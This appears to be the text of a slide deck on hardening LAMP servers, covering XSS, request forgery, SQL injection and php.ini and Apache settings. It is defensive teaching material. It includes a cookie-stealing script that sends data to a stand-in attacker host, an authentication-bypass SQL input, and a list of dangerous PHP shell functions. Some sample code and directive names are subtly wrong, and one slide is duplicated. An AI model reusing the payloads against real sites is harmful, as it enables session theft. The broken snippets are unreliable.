What's New in Teams Calling, Meetings and Devices March 2024
LAMP security practices
1. LAMP Security Practices
XSS
Request Forgeries
SQL Injection
Disable PHP, Apache, OS information
Disable unnecessary modules
Log PHP errors
Disable/Limit file uploads
DoS attack
Remote Code execution
Disable dangerous PHP functions
Limit access to file system
2. XSS
A hacker posts the below given code snippet in
the comment section of website
http://exsite.com.
Hello Everyone!<script>document.write("<img
src="http://evilhacker.org/?" + document.cookie + "'>);</script>
The code will load as it is whenever I will open
the website http://exsite.com and will transfer
my cookie data to hacker's site
(http://evilhacker.org):-
Note that cookie data may have my login
credentials which you as a hacker can use to
3. XSS solution
All user submitted content should be filtered and
all the disallowed characters should be
removed
In particular <, >, and all html tags should be
stripped
4. Request Forgeries
Create, Update and Delete requests should be
ensured to have originally generated from your
application
Ex. Dont use url like
http://mysite.com/photos/delete/photo_id to
delete a photo. Instead use a signature url valid
for a predefined time. Check the below code:-
$_SESSION['signature'] = md5(unique(rand(), true) + $username);
$_SESSION['signature_timestamp'] = time()
echo “<a href='http://mysite.com/photos/delete/photo_id?signature
={$_SESSION['signature']}'>”
5. Request Forgeries
Create, Update and Delete requests should be
ensured to have originally generated from your
application
Ex. Dont use url like
http://mysite.com/photos/delete/photo_id to
delete a photo. Instead use a signature url valid
for a predefined time. Check the below code:-
$_SESSION['signature'] = md5(unique(rand(), true) + $username);
$_SESSION['signature_timestamp'] = time()
echo “<a href='http://mysite.com/photos/delete/photo_id?signature
={$_SESSION['signature']}'>”
6. SQL Injection
Ex. Input ' OR '1'='1 in userid field of login form. If
server script for authentication uses “ Select * FROM
tblusers WHERE userid = '$_GET['userid']' ”, this code will be
interpolated to “ Select * FROM tblusers WHERE userid = '' OR
'1'='1' ” which will result in valid records getting
returned from database.
7. SQL Injection Solution
Use mysqli_real_escape_string($_GET['userid']) for all
user supplied data
Use prepared statements:-
$statement = $connection->prepare( "SELECT * FROM tblusers
WHERE userid = ?" );
$statement->bind_param( "i", $_GET['userid'] );
$statement->execute();
8. Disable PHP information
Run the command :
curl -I http://mysite.com/
HTTP/1.1 200 OK
Date: Sat, 28 eApr 2012 09:48:55 GMT
Server: Apache/2.2.20 (Ubuntu)
X-Powered-By: PHP/5.3.6-13ubuntu3.6
The output shows that the sites runs on PHP and
the version of PHP as well
Disable the information by setting expose_php=off in
php.ini
9. Disable Server Information
Run the command :
curl -I http://mysite.com/
HTTP/1.1 200 OK
Date: Sat, 28 eApr 2012 09:48:55 GMT
Server: Apache/2.2.20 (Ubuntu)
The output shows Apache server, its version, and
OS Ubuntu information
Disable these information by setting
ServerSignature Off
ServerTokens Prod
in /etc/apache2/conf.d/security file for Ubuntu or in httpd.conf file
10. Disable unnecessary modules
Use php -m to check list of enabled modules
Disable modules like gd if not required
On Ubuntu, goto folder /etc/php5/conf.d
Run: sudo mv gd.{ini,disable} This will rename file gd.ini to
gd.disable and then the gd module will not be
loaded with php
11. Log PHP errors
Use following to hide PHP error messages to be
diaplayed to site users
display_errors = Off
Use following to log the PHP error messages into
a log file
log_errors = On
error_log = /var/log/httpd/php-error.log
For realtime monitoring of php error log use:-
tail -f /var/log/httpd/php-error.log
12. Disable File Uploads
If your site doesnt want file upload functionality,
remove it from php.ini :-
file_uploads = Off
If your site wants file upload functionality, set it to
only the required minimum value :-
file_upload = On
upload_max_size = 1M
13. DoS attack
To avoid script taking an infinite time and bringing
down the server, use following settings:-
max_execution_time = 30
max_input_time = 30
memory_limit = 40M
14. Remote Code Execution
Remote urls can be opened by PHP functions
like fopen, file_get_contents, include, require
These remote urls are many time causes of code
injection and data leakage when not filtered by
programmers carefully.
To restrict remote file opening:-
allow_url_fopen = Off
allow_url_include = Off
15. Disable Dangerous PHP functions
Use following directive to disable the php
functions that are very powerful, dangerous and
not normally required when PHP is running with
a web server :-
disable_functions = exec, passthru, shell_exec, system, proc_open, popen,
curl_exec, curl_multi_exec, parse_ini_file, show_source
16. Limit Access to File System
Use following to restrict PHP's access to parts of
file system:-
open_basedir="/var/www/html/"
The above will not allow PHP access to parts of
file system like /etc or /tmp etc.
17. Session file path
Session files must be saved away from the web
site folder. Use following to change session
files location:-
session.save_path="/var/lib/php/session"
upload_tmp_dir="/var/lib/php/upload"
18. Write protect conf and application
files
Use chattr +i command to write protect any file
chattr +i /etc/php5/php.ini
chattr +i /etc/mysql/my.cnf
chattr +i /etc/apache2/apache2.conf
chattr +i /var/www/html/
Such files then can not be modified even by root
user.
Use chattr -i command to revert back the write
protection